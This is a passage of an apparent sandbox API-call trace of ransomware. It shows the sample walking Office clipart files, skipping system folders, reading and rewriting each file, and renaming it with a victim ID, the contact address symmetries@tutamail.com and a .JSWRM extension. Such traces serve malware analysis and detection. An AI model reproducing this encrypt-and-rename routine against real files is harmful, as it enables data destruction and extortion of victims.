0x21f6d8 [0073.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0073.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0073.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0073.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0073.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0073.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.431] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0073.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.432] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb58a9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fa1, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00040_.GIF", cAlternateFileName="")) returned 1 [0073.432] lstrcmpiW (lpString1="AG00040_.GIF", lpString2=".") returned 1 [0073.432] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="..") returned 1 [0073.432] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="...") returned 1 [0073.432] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="windows") returned -1 [0073.432] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="recovery") returned -1 [0073.432] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="perflogs") returned -1 [0073.432] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="documents and settings") returned -1 [0073.433] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.433] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="system volume information") returned -1 [0073.433] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="msocache") returned -1 [0073.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0073.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00040_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00040_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00040_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0073.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0073.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00040_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00040_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00040_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0073.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.433] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8097) returned 1 [0073.433] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fa0) returned 0x24c1d0 [0073.433] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1fa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1fa0, lpOverlapped=0x0) returned 1 [0073.436] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.436] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1fa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1fa0, lpOverlapped=0x0) returned 1 [0073.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.436] CloseHandle (hObject=0x460) returned 1 [0073.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0073.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0073.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0073.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0073.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0073.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.436] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0073.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.437] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e06, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00052_.GIF", cAlternateFileName="")) returned 1 [0073.437] lstrcmpiW (lpString1="AG00052_.GIF", lpString2=".") returned 1 [0073.437] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="..") returned 1 [0073.437] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="...") returned 1 [0073.437] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="windows") returned -1 [0073.437] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="recovery") returned -1 [0073.437] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="perflogs") returned -1 [0073.437] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="documents and settings") returned -1 [0073.437] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.438] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="system volume information") returned -1 [0073.438] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="msocache") returned -1 [0073.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0073.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00052_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00052_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00052_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0073.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0073.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00052_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00052_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00052_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0073.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.439] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7686) returned 1 [0073.439] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e00) returned 0x24c1d0 [0073.439] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1e00, lpOverlapped=0x0) returned 1 [0073.441] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.441] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1e00, lpOverlapped=0x0) returned 1 [0073.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.441] CloseHandle (hObject=0x460) returned 1 [0073.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0073.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0073.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0073.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0073.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0073.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.442] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0073.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.442] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e73, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00057_.GIF", cAlternateFileName="")) returned 1 [0073.442] lstrcmpiW (lpString1="AG00057_.GIF", lpString2=".") returned 1 [0073.442] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="..") returned 1 [0073.442] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="...") returned 1 [0073.442] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="windows") returned -1 [0073.442] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="recovery") returned -1 [0073.442] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="perflogs") returned -1 [0073.442] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="documents and settings") returned -1 [0073.442] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.443] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="system volume information") returned -1 [0073.443] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="msocache") returned -1 [0073.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0073.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00057_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00057_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00057_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0073.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00057_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00057_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00057_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.444] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11891) returned 1 [0073.444] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e70) returned 0x24c1d0 [0073.444] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2e70, lpOverlapped=0x0) returned 1 [0073.446] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.446] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2e70, lpOverlapped=0x0) returned 1 [0073.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.446] CloseHandle (hObject=0x460) returned 1 [0073.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0073.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0073.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0073.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0073.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0073.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.447] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), lpNewFileName="C:\\Program 